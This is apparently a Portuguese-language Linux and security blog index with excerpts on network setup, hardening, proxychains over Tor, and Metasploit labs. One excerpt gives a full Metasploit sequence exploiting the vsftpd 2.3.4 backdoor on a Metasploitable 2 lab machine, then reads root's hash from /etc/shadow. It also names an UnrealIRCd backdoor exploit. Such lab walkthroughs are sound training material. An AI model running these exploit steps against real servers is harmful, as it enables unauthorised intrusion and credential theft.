Links Úteis para a configuração de Rede no Linux

https://help.ubuntu.com/lts/serverguide/network-configuration.html https://www.debian.org/doc/manuals/debian-reference/ch05.pt.html https://wiki.debian.org/NetworkConfiguration https://www.centos.org/docs/5/html/Deployment_Guide-en-US/ch-networkscripts.html https://www.centos.org/docs/5/html/5.2/Deployment_Guide/s2-sysconfig-network.html https://www.suse.com/documentation/sled-12/book_sle_admin/data/sec_basicnet_manconf.html Também há um post neste blog explicando como realizar esta tarefa nas distros Ubuntu e Debian.

Ferramentas de Segurança

Segue abaixo uma lista de softwares e sistemas operacionais úteis na área de segurança da informação. Muitas dessas ferramentas são encontradas em distribuições como o Kali Linux e o DEFT Linux. Lembre-se: são várias ferramentas de um vasto conjunto e todos os profissionais da área possuem suas preferencias.   1. Informações sobre vulnerabilidades: https://www.exploit-db.com/ https://www.offensive-security.com/… Continuar lendo Ferramentas de Segurança

Instalação e Configuração JDK no Debian ou Ubuntu via apt-get e Manual

Caso haja necessidade de utilização do Apache Tomcat em é necessário desinstalar o OpenJDK e instalar o JDK da Oracle. Há duas maneiras possíveis: A instalação através do comando apt-get ou a instalação manual. Faça isso como usuário root (Ubuntu e Debian) ou sudo (Ubuntu). 1. Instalação do JDK através do apt-get. Utilize os comandos… Continuar lendo Instalação e Configuração JDK no Debian ou Ubuntu via apt-get e Manual

FirewallBuilder

Toda configuração de segurança de um servidor Linux nível paranóico, tem o iptables/ip6tables[1] ou o nftables[2] instalado e configurado no servidor mesmo tendo outras soluções de firewall na rede (do datacenter). Não há problema algum em utilizar soluções gráficas como o Firewall Builder[3] para a criação das regras do firewall. Lembre-se neste caso que o… Continuar lendo FirewallBuilder

Hardening do Linux: Verificando Serviços Ativos e Runlevels no Debian

1. Verifique os serviços ativos. Utilize os comandos (exemplo): netstat –listening | grep 3306 nestat -nap | grep 3306 Os comandos acima verificam se o MySQL está sendo executado (porta 3306) permitindo o acesso remoto (0.0.0.0). Também utilize ferramentas como o nmap e o zenmap para maiores informações sobre serviços sendo executados em outro(s) host(s).… Continuar lendo Hardening do Linux: Verificando Serviços Ativos e Runlevels no Debian

Configurações de Rede no Debian ou Ubuntu

1. Se arrependeu do nome do servidor? Edite o arquivo “/etc/hostname”. 2. Edite o arquivo “/etc/network/interfaces”. Para a configuração de IP estático em um servidor linux edite o arquivo “/etc/network/interfaces”. Um exemplo segue abaixo: # This file describes the network interfaces available on your system # and how to activate them. For more information, see… Continuar lendo Configurações de Rede no Debian ou Ubuntu

Instalação e Utilização do proxychains

O proxychains serve para a utilização de qualquer software com a Rede Tor. Para a instalação no Debian (7 e 8) e Ubuntu (16.04): apt-get install tor proxychains Para utilizá-lo no Debian ou Ubuntu, siga as instruções abaixo: 1. Edite o arquivo de configuração do proxychains através do comando “gedit /etc/proxychains.conf”. 2. Comente a linha… Continuar lendo Instalação e Utilização do proxychains

Comandos do Metasploit para um backdoor através do vsftp

Neste caso o alvo é servidor Metasploitable 2 utilizando Kali Linux. As instruções seguem abaixo: msfconsole msf > search vsftpd msf > use exploit/unix/ftp/vsftpd_234_backdoor msf > show options msf > set RHOST 192.168.56.101 msf > exploit whoami hostname grep root /etc/shadow Obs.: O mesmo pode ser feito com o exploit abaixo: msf > use exploit/unix/irc/unreal_ircd_3281_backdoor

Um exemplo de utilização do Armitage

Siga as instruções abaixo: 1. Inicie o Kali Linux e servidor Metasploitable 2 em rede virtual. 2. No terminal do Kali Linux digite em sequência os comandos: service postgresqls start   msfconsole 3. No metasploit (msfconsole) digite o comando “db_status”. Se a saída for diferente de “[*] postgresql connected to msf” encerre o aplicativo (comando… Continuar lendo Um exemplo de utilização do Armitage